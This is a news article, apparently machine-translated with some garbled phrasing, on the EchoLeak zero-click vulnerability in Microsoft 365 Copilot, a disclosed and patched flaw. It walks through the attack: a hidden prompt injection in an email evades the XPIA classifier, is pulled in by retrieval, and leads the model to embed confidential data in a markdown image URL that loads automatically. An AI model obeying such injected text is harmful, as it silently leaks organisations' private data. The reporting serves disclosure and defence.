A new attack called Echoleak It is the first type vulnerability Zero-Click (without click) known that allows attackers Exfiltrate sensitive data from Microsoft 365 Copilot without the need for interaction by the user.
The attack was developed by AIM Labs researchers in January 2025 and reported to Microsoft. The company assigned the identifier CVE-2025-32711 To this information dissemination failure, he described it as critical and solved it at the server level in May, so No action is required by users.
Microsoft has pointed out that No evidence has been exploitedhence No client is affected.
Microsoft 365 Copilot is an assistant to the integrated in applications of Office as Word, Excel, Outlook and Teams. Use GPT language models of OpenAIas well as Chatgpttogether with Microsoft Graph To help users generate content, analyze data and answer questions based on internal files, emails and chats of the organization that is using it.
Although Echoleak has been corrected and has not been used by malicious actors, illustrates a new class of vulnerabilities what aim labs call LLM Scope Violation. This type of failure allows a language model to filter internal data without intention or interaction of the user.
By not requiring the victim’s interaction, the attack can be automated to perform Silent data about data In corporate environments, which demonstrates how dangerous these vulnerabilities can be in systems that integrate.
How Echoleak works
The attack begins with sending a malicious email to the target. The message, which looks like a common mail of work, contains a Hidden Prompt injection Designed to instruct the language model to extract and send sensitive internal data.
As the message is written as if it were a legitimate communication between people, manages to avoid Microsoft’s defense mechanismsas the classifier XPIA CROSS-PROMPT INJECTION ATTACK O. This is an automatic system that detects possible attacks that try to inject malicious orders into the texts that Copilot analyzes.
Later, when the user makes a related consultation in co -pilot, the engine RAG (Retrieval-Augmented generation or increased generation by recovery)in charge of recovering relevant information, files or chats that may be related to what the user asks, automatically incorporates the malicious mail for its format and apparent relevance for the action demanded by the user.
At that time, malicious injection reaches the model and ‘Decoa’ to draw confidential information And insert it into a fraudulent link, in an image that does not exist, whose function is to exfilter that data.
The last step has to do with Markdown Codea very basic format language, used to style the text in a simple way. It also allows, for example, to insert images or links with a very simple syntax.
When a system, co -pilot in this case, generates that type of text, The browser always interprets that the image (false) must load from the indicated web address. That load occurs automatically, without clicking on the user. In doing so, send the information embedded in the URL to the attacker’s server.